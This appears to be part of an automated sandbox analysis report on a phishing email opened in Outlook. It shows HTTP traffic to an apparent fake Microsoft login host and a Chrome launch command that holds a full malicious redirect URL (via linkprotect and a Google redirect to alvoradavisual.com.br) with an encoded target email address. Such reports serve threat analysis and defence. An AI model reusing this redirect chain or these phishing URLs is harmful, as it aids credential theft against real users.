                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:27:58 UTC743INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:27:58 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: dcda2ac7-519c-4c48-a94a-0335536e0b00
                                                                                                                                                                                                x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:27:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                Start time:02:23:43
                                                                                                                                                                                                Start date:05/12/2024
                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\SBO Catch up call pf.msg"
                                                                                                                                                                                                Imagebase:0xad0000
                                                                                                                                                                                                File size:34'446'744 bytes
                                                                                                                                                                                                MD5 hash:91A5292942864110ED734005B7E005C0
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                Start time:02:23:51
                                                                                                                                                                                                Start date:05/12/2024
                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "70B31B44-41D0-4A8A-9A35-9C4EDE4E08A3" "394EF357-1A0B-4E1A-BBCB-9F7F5C0CEAAD" "5604" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                                                                                                                                                                                                Imagebase:0x7ff64e0b0000
                                                                                                                                                                                                File size:710'048 bytes
                                                                                                                                                                                                MD5 hash:EC652BEDD90E089D9406AFED89A8A8BD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:02:24:09
                                                                                                                                                                                                Start date:05/12/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fgoogle.dz%2furl%3fq%3dnrnq5JLi6z3yh%26rct%3dtTPvvq6xRyj7Y00xDjnlx9kIjusucT%26sa%3dt%26url%3damp%2fs%252falvoradavisual.com.br%252fyoya%2fcjbh%2fa2xhdXMubWFkZXJAc2JvLmNvLmF0%c3%a3%e2%82%ac%e2%80%9a%24%24%24%c3%a3%e2%82%ac%e2%80%9a&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1
                                                                                                                                                                                                Imagebase:0x7ff678760000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:02:24:09
                                                                                                                                                                                                Start date:05/12/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,7133077948100089436,13748270433531493616,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                Imagebase:0x7ff678760000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                No disassembly